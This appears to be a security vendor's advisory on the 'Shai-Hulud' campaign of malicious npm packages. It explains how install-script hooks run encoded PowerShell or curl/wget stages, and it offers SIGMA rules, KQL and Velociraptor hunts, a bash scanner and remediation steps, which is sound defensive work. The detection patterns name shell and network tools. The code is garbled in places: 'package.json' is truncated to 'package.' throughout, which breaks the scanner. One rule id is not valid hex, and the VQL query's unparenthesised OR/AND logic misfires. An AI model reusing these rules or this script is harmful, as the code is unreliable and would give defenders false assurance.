Shai-Hulud Supply Chain Attack: Detection and Remediation for 600 Compromised npm Packages

A massive supply-chain attack campaign, dubbed "Shai-Hulud," has flooded the Node Package Manager (npm) registry with over 600 malicious packages. This is not a simple dependency confusion error; it is a coordinated typosquatting and obfuscation operation designed to infiltrate development environments and CI/CD pipelines.

For defenders, the urgency is high: a single npm install command in a compromised environment can trigger the execution of malware capable of stealing environment variables (AWS, Azure, GCP keys), cryptocurrency wallet data, and establishing persistence. This article provides the technical analysis and defensive intelligence required to hunt for, identify, and remediate this threat immediately.

Technical Analysis

Affected Platform: Node Package Manager (npm), Node.js runtime environments (Windows, Linux, macOS).

Attack Vector:

Typosquatting: Threat actors publish packages with names intentionally similar to popular legitimate libraries (e.g., axios-utils vs axios or express-proxy vs express-proxy-middleware).
Malicious Installation Scripts: The primary infection vector resides in the package. file of these malicious packages. specifically the preinstall, postinstall, or install scripts.
Payload Execution: Upon execution (npm install malicious-pkg), the script runs a shell command. In the Shai-Hulud campaign, this typically involves:
- Windows: Spawning powershell.exe with Base64-encoded commands (-Enc or -EncodedCommand) to download and execute further payloads or exfiltrate data.
- Linux/macOS: Spawning bash or sh to utilize curl or wget for fetching remote scripts, often using pastebin or similar text storage services to host the second stage.

Exploitation Status: Active exploitation in the wild. The packages are currently being published and downloaded.

Detection & Response

The Shai-Hulud campaign relies on the trust relationship between the developer and the package manager. The key observable behavior is the Node Package Manager (npm or node) spawning unauthorized shell processes (powershell, bash, sh) or network utilities (curl, wget).

SIGMA Rules

YAML

---
title: Potential Shai-Hulud NPM Malware - PowerShell Encoded Payload
id: 8d4f2c10-9b5a-4a6e-8d1f-2c3b4a5d6e7f
status: experimental
description: Detects npm or node processes spawning PowerShell with encoded commands, a hallmark of the Shai-Hulud supply chain attack utilizing postinstall scripts.
references:
  - https://www.bleepingcomputer.com/news/security/new-shai-hulud-malware-wave-compromises-600-npm-packages/
author: Security Arsenal
date: 2024/10/24
tags:
  - attack.execution
  - attack.t1059.001
  - attack.supply_chain
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith:
      - '\npm.exe'
      - '\npm.cmd'
      - '\node.exe'
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-EncodedCommand'
      - '-enc '
  condition: selection
falsepositives:
  - Legitimate build scripts utilizing PowerShell (Rare in standard npm usage)
level: high
---
title: NPM Spawning Shell or Network Tools on Linux
id: 9e5g3d21-0c6b-5b7f-9e2g-3d4c5e6f7a8b
status: experimental
description: Detects npm processes spawning bash, sh, curl, or wget, indicative of malicious postinstall scripts fetching payloads or exfiltrating data.
references:
  - https://www.bleepingcomputer.com/news/security/new-shai-hulud-malware-wave-compromises-600-npm-packages/
author: Security Arsenal
date: 2024/10/24
tags:
  - attack.execution
  - attack.t1059.004
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    ParentImage|endswith:
      - '/npm'
      - '/node'
    Image|endswith:
      - '/bash'
      - '/sh'
      - '/curl'
      - '/wget'
  condition: selection
falsepositives:
  - Legitimate development scripts requiring system calls (Verify script legitimacy)
level: medium

KQL (Microsoft Sentinel / Defender)

KQL — Microsoft Sentinel / Defender

// Hunt for Shai-Hulud indicators: npm spawning suspicious processes
DeviceProcessEvents
| where Timestamp >= ago(7d)
| where InitiatingProcessFileName in~ ("npm.exe", "node.exe", "npm", "node")
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "bash", "sh", "curl", "wget")
| extend ProcessCommandLine = ProcessCommandLine // Normalize for display
| project Timestamp, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine, AccountName, FolderPath
| order by Timestamp desc

Velociraptor VQL

VQL — Velociraptor

-- Hunt for Shai-Hulud: Node.js spawning shells or network tools
SELECT Pid, Name, CommandLine, Exe, Username, Parent.Pid AS ParentPid, Parent.Name AS ParentName
FROM pslist()
WHERE Parent.Name =~ "node"
   OR Parent.Name =~ "npm"
   AND Name =~ "(powershell|pwsh|bash|sh|curl|wget|cmd)"

Remediation Script (Bash)

This script scans the node_modules directory for package. files containing suspicious script hooks (preinstall, postinstall) that invoke shells or network tools, which is the primary method of persistence for Shai-Hulud.

Bash / Shell

#!/bin/bash
# Security Arsenal - Shai-Hulud Remediation Scanner
# Scans node_modules for package. files with suspicious script hooks

echo "[*] Shai-Hulud Supply Chain Scanner"
echo "[*] Scanning current directory for node_modules..."

if [ ! -d "node_modules" ]; then
    echo "[!] No node_modules directory found in current path."
    exit 0
fi

echo "[*] Analyzing package. files for suspicious script hooks..."

# Find package. files and check for specific malicious patterns in script sections
find node_modules -name "package." -type f -exec grep -l "\"preinstall\"\|\"postinstall\"\|\"install\"" {} \; | while read -r file; do
    # Extract the script content to check for suspicious keywords
    if grep -A 5 "\"preinstall\"\|\"postinstall\"\|\"install\"" "$file" | grep -iE "curl|wget|bash|sh|powershell|base64|eval|\$\(.*\)" > /dev/null; then
        echo "[!] SUSPICIOUS PACKAGE DETECTED: $file"
        echo "    Contains script hook with shell/network commands."
        # Optional: Output the suspicious line for context
        grep -A 5 "\"preinstall\"\|\"postinstall\"\|\"install\"" "$file" | head -n 6
    fi
done

echo "[*] Scan complete."
echo "[*] Recommended Action: Run 'npm audit' and review specific package versions."

Remediation

Immediate Audit: Run npm audit in all development and production environments. While Shai-Hulud packages are new, the npm registry updates advisories quickly. Pay strict attention to "moderate" and "high" severity vulnerabilities related to "malicious path" or "prototype pollution."
Check package. Integrity: Review your package-lock. against the source control repository. Look for packages that:
- You do not recognize.
- Are slightly misspelled versions of popular packages (e.g., react-dom vs react-domx).
- Were recently added without a corresponding PR or ticket.
Clean and Reinstall: If a malicious package is identified:
- Delete the node_modules folder.
- Delete the package-lock. file.
- Review and clean the package. to remove the malicious dependency.
- Run npm install to regenerate the lock file with clean versions.
Credential Rotation: If your environment was compromised (i.e., the malware executed), assume that environment variables (.env files) containing cloud keys (AWS/Azure/GCP), database credentials, or API tokens were exfiltrated. Rotate these secrets immediately.
Developer Education: Mandate that developers use npm audit as a pre-commit hook or a pre-merge gate in CI/CD pipelines to catch typosquatting attacks before they reach production builds.

Related Resources

Security Arsenal Incident Response Services AlertMonitor Platform Book a SOC Assessment incident-response Intel Hub